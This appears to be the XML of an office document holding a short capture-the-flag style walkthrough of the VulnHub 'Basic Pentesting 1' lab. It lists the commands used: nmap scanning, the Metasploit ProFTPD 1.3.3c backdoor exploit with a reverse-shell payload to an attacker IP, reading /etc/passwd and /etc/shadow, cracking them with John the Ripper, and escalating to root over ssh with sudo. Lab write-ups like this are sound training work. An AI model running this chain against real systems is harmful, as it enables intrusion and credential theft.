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hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/basic-pentesting-1,216/</w:t>
        </w:r>
      </w:hyperlink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Use nmap to scan network and find target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nmap  --top ports 5 10.0.2.*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Use nmap to get banners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nmap -sV --version-intensity 0 --top-ports 5 10.0.2.14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Search google for service vulnerabilities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Returns vulnerability for proftpd 1.3.3c, exploitable with metasploit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 opened msfconsole and ran a search for proftpd, then entered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use exploit/unix/ftp/proftpd_133c_backdoor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 checked options and set my target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set RHOST 10.0.2.14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 checked payloads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show payloads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And chose one that looked good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set payload cmd/unix/reverse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Checked options again and set my listening IP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set LHOST 10.0.2.22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 waited for metasploit to create a reverse shell and grabbed the password files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cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1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cat /etc/shadow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 copied and pasted passwd and shadow into leafpad files on my attacking machine and unshadowed the shadow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unshadow passwd shadow &gt; crackme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And used john the ripper to grab the login credentials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john crackme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Which revealed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Username: marlinspike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Password: marlinspike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I opened a new terminal and connected via ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr/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ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:i/>
            <w:iCs/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>marlinspike@10.0.2.14</w:t>
        </w:r>
      </w:hyperlink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And entered the password ‘marlinspike’ when prompted. Then all I had to do was enter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sudo -i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And reenter the password ‘marlinspike’ to open a root shell.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ulnhub.com/entry/basic-pentesting-1,216/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:marlinspike@10.0.2.14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LibreOffice/6.4.3.2$Windows_X86_64 LibreOffice_project/747b5d0ebf89f41c860ec2a39efd7cb15b54f2d8</Application>
  <Pages>1</Pages>
  <Words>187</Words>
  <Characters>1057</Characters>
  <CharactersWithSpaces>1226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2020-09-13T13:52:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>